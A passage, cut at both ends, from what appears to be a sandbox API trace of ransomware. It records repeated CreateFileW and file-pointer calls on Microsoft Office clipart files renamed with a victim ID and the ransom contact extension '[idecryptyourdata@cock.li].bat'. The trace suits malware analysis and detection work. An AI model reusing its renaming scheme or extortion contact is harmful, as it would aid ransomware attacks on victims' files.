Office\\root\\CLIPART\\PUB60COR\\J0234376.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0234376.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.359] CloseHandle (hObject=0x51c) returned 1 [0165.360] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.360] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237225.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237225.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.360] CloseHandle (hObject=0x51c) returned 1 [0165.361] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.361] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.361] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237228.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237228.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.362] CloseHandle (hObject=0x51c) returned 1 [0165.363] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.363] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.363] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237336.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237336.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.363] CloseHandle (hObject=0x51c) returned 1 [0165.368] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.368] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.368] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0237759.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0237759.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.368] CloseHandle (hObject=0x51c) returned 1 [0165.369] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.369] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238333.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238333.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.369] CloseHandle (hObject=0x51c) returned 1 [0165.375] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.376] SetFilePointerEx (in: hFile=0x51c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.376] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238927.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238927.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.377] CloseHandle (hObject=0x51c) returned 1 [0165.734] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.735] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0238959.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0238959.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.735] CloseHandle (hObject=0x528) returned 1 [0165.736] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.736] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.736] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239057.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239057.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.736] CloseHandle (hObject=0x528) returned 1 [0165.737] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.737] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.737] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239063.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239063.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.737] CloseHandle (hObject=0x528) returned 1 [0165.738] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.739] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.739] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239079.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239079.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.739] CloseHandle (hObject=0x528) returned 1 [0165.740] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.740] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.740] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239191.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239191.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.740] CloseHandle (hObject=0x528) returned 1 [0165.741] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.742] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.742] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239611.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239611.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.742] CloseHandle (hObject=0x528) returned 1 [0165.743] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.743] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.743] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239935.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239935.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.744] CloseHandle (hObject=0x528) returned 1 [0165.744] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.744] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.744] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239941.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239941.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.745] CloseHandle (hObject=0x528) returned 1 [0165.746] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.746] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239943.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239943.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.746] CloseHandle (hObject=0x528) returned 1 [0165.748] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.748] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.748] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239951.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239951.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.748] CloseHandle (hObject=0x528) returned 1 [0165.750] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.750] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.750] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239953.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239953.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.750] CloseHandle (hObject=0x528) returned 1 [0165.750] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.750] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.750] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239955.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239955.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.751] CloseHandle (hObject=0x528) returned 1 [0165.751] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.751] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.751] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239965.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239965.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.752] CloseHandle (hObject=0x528) returned 1 [0165.753] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.753] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.753] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239967.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239967.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.753] CloseHandle (hObject=0x528) returned 1 [0165.754] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.754] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.754] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239973.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239973.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.755] CloseHandle (hObject=0x528) returned 1 [0165.756] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.756] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.756] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239975.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239975.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.756] CloseHandle (hObject=0x528) returned 1 [0165.758] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.758] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0239997.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0239997.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.758] CloseHandle (hObject=0x528) returned 1 [0165.759] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.759] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.759] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240157.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240157.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.759] CloseHandle (hObject=0x528) returned 1 [0165.760] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.760] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.760] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240175.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240175.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.761] CloseHandle (hObject=0x528) returned 1 [0165.762] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.762] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.762] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240189.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240189.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.762] CloseHandle (hObject=0x528) returned 1 [0165.763] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.763] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.763] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0240291.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0240291.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.763] CloseHandle (hObject=0x528) returned 1 [0165.764] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.764] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.764] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241019.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241019.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.764] CloseHandle (hObject=0x528) returned 1 [0165.765] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.765] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241037.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241037.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.766] CloseHandle (hObject=0x528) returned 1 [0165.767] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.767] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.767] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241041.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241041.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.767] CloseHandle (hObject=0x528) returned 1 [0165.768] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.768] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.768] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241043.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0241043.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.768] CloseHandle (hObject=0x528) returned 1 [0165.769] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.769] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x39ffec0 | out: lpNewFilePointer=0x0) returned 1 [0165.770] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0241077.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft 